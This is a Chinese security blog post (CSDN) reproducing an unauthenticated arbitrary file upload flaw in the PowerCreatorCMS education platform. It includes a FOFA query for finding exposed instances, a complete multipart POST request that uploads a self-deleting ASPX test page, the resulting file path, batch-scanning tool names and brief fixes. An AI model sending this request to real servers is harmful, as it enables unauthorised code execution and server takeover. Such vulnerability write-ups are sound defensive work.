【漏洞复现】PowerCreatorCMS UploadResourcePic 任意文件上传漏洞

于 2024-07-17 10:25:14 发布
阅读量330 收藏 1
点赞数 15
分类专栏: 漏洞复现篇 文章标签: PowerCreatorCMS 文件上传
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/140487417
版权

0x01 产品简介

PowerCreator CMS是翰博尔信息技术有限公司(简称翰博尔PowerCreator)推出的一款教育资源管理平台,专注于教育领域的信息化解决方案。PowerCreator CMS是集成了软件平台和硬件设备、多系统高度融合的教育资源管理平台。它旨在通过技术手段提升教育资源的管理、共享和应用效率,助力教育机构实现教学管理的现代化和智能化。

0x02 漏洞概述

PowerCreatorCMS UploadResourcePic 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 搜索引擎

app="PowerCreator-CMS"

在这里插入图片描述

0x04 漏洞复现

POST /upload/UploadResourcePic.ashx?ResourceID=8382 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate
Connection: close
 
-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="qaz.aspx"
Content-Type: image/jpeg
 
<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
-----------------------------20873900192357278038549710136--

在这里插入图片描述

/ResourcePic/ODM4Mg==.ASPX

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

0x06 修复建议

1、关闭互联网暴露面或接口设置访问权限
2、升级至安全版本

SuperherRo
关注
  • 15
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PowerCreatorCMS UploadResourcePic 任意文件上传漏洞复现
0xSec
07-12 894
PowerCreatorCMS UploadResourcePic 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
复现awvs——FCKeditor 任意文件上传漏洞思维引导到getshell
记录并分享学习安全的知识点..
03-20 6547
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、复习文件解析漏洞 解析漏洞,是指中间件(Apache、nginx、iis等)在解析文件时出现了漏洞,从而,黑客可以利用该漏洞实现非法文件的解析。 (一)Apache解析漏洞 Apache解析文件规则是从右到左。例如shel.php.gix.ccc,apache会先识别ccc,ccc不被识别,则识别gix,以此类推,最后会被识别为php来运行。 文件解析漏洞总结-Apache_1stPeak的博客-CSDN...
用友NC任意文件上传漏洞复现
热门推荐
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
finecms存在任意文件上传漏洞复现
炙热的酷盖
08-05 2802
因为自己淋过雨,所以不想别人湿鞋 漏洞环境:finecms公益软件 finecms 存在任意文件上传:MIME验证 fofa: title=“FineCMS公益软件” && country=“CN” 首先注册一个账号yy 上传一个真实图片 3. 打开burpsuite进行抓包和改包 4. 制作图片马  准备一个正常图片1.jpep  准备一个php一句话木马1.php  将1.jpep和1.php放入相同路径下  cmd命令进入路径输入命令:copy 1.jpeg/a +1
畅捷通T+ v17任意文件上传漏洞复现
fly夏天的博客
09-01 4209
畅捷通T+ v17任意上传漏洞复现
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4580
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
金蝶云星空 CommonFileServer 任意文件读取漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
11-14 814
金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞,攻击者可利用此漏洞获取服务器上的任意文件,包括数据库凭据、API密钥、配置文件等,从而获取系统权限和敏感信息。
EarCMS 前台任意文件上传漏洞复现
0xSec
12-07 1208
EarCMS前台put_upload.php中,存在pw参数硬编码问题,同时sql语句pdo使用错误,没有有效过滤sql语句,可以控制文件名和后缀,导致可以任意文件上传
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
Adminer≤4.6.2任意文件读取漏洞1
08-03
【Adminer≤4.6.2任意文件读取漏洞详解】 Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...
漏洞复现是什么如何复现.txt
01-31
漏洞复现
基于Springboot的在线英语阅读平台的设计与实现论文
07-16
传统方式管理信息存在诸多不足,如耗时较长、数据错误率高、错误数据更正困难以及数据检索繁琐费力。因此,通过在计算机上部署在线英语阅读分级平台软件,可以充分发挥其高效的信息处理能力,从而规范信息管理流程,使管理工作更加系统化和程序化。同时,该平台的有效应用还能助力管理人员准确快速地处理信息。 在开发工具的选择上,在线英语阅读分级平台经过慎重考虑,为便于开发实现,选用了IDEA作为开发工具,并采用Mysql作为数据库工具。以此为基础搭建开发环境,实现在线英语阅读分级平台的各项功能,包括管理员对用户和新闻公告的管理。 作为一款基于软件开发技术设计实现的应用系统,在线英语阅读分级平台在信息处理方面表现出色,无论是数据添加、数据维护和统计,还是数据查询等处理需求,该平台都能轻松应对。
关于红外传感器的计数器设计.docx
07-16
传感器
中国航空研究院609研究所考研10个学院,38个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
07-16
中国航空研究院609研究所考研10个学院,38个专业课历年考试真题及答案汇总整理,备考资料题库视频.pdf
MATLAB基础入门教程 MATLAB使用详解 第8章 函数分析 共10页.pptx
07-16
【课程大纲】 第1章 MATLAB7.0安装与卸载 共5页.pptx 第2章 MATLAB7.0用户界面 共19页.pptx 第3章 MATLAB7.0入门 共10页.pptx 第4章 MATLAB7.0的矩阵和数组 共28页.pptx 第5章 MATLAB7.0的数据类型 共20页.pptx 第6章 元胞和构架 共12页.pptx 第7章 矩阵分析 共35页.pptx 第8章 函数分析 共10页.pptx 第9章 数据分析 共19页.pptx 第10章 高级数值计算 共32页.pptx 第11章 符号计算 共35页.pptx 第12章 二维图形 共25页.pptx 第13章 三维图形 共11页.pptx 第14章 图形对象和句柄 共29页.pptx 第15章 MATLAB7.0程序设计 共35页.pptx 第16章 程序调试、优化和出错处理 共14页.pptx 第17章 图形用户界面(GUI) 共22页.pptx 第18章 MATLAB 文件IO操作 共15页.pptx 第19章 MATLAB 7.0编译器 共16页.pptx 第20章 应用程序接口 共19页.pptx 第21章 Notebook的运用 共16页.pptx 第22章 SIMULINK入门 共50页.pptx 第23章 SIMULINK高级技术 共47页.pptx 第24章 图像处理工具箱 共27页.pptx 第25章 信号处理工具箱 共45页.pptx 第26章 小波分析工具箱 共8页.pptx
基于单片机的液压系统在线状态监测系统研究
最新发布
07-16
液压系统状态监测技术是保证液压设备在安全可靠的状态下高效运行的有效手段和方法。目前,液压系统状态监测技术主要反映在通过监测液压系统的压力、流量和温度等参数来获得液压系统的功率等状态信息。鉴于这一方法的诸多缺陷,本文通过监测液压动力系统中电机的电流参数和电压参数,获得液压动力系统的输入功率,再经过神经网络训练出各相关环节的效率参数从而获得系统的输出功率,为液压系统的在线状态监测提供了一种新的方法。 针对现有监测方法的不足,本文提出了以电机—油泵功率数学模型为理论基础,以准同步采样算法为技术核心,以基于单片机的数字采集系统为监测系统的硬件基础,以上位机为监测系统的运行平台进行液压系统的在线状态监测。通过对液压系统状态监测器的软、硬件设计,研制出了该数据采集系统的样机和上位机监测系统软件,并通过大量的实验对监测器功能进行了检测,验证了上述状态监测方法的可行性和实用性。
万户oa officeserver.jsp任意文件上传漏洞复现
12-22
这是一个常见的漏洞,攻击者可以利用它上传恶意文件到服务器上,从而对系统进行攻击。首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上传漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上传恶意的文件,比如Webshell文件。 在上传过程中,攻击者可能需要绕过一些安全控制,可能需要修改请求头或使用特定的文件格式来欺骗服务器。一旦成功上传了恶意文件,攻击者就可以利用它来执行任意的命令,比如查看、修改和删除服务器上的文件,甚至获取系统权限。 为了防止这种漏洞的发生,系统管理员可以采取一些措施,比如限制上传文件的类型和大小、检查上传文件的内容、限制上传文件的访问权限等。此外,及时更新系统补丁,加强对系统的监控和日志审计也是非常重要的。对于已知的漏洞,及时修复和更新系统也是必不可少的。 总的来说,要防范万户OA officeserver.jsp任意文件上传漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修复,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值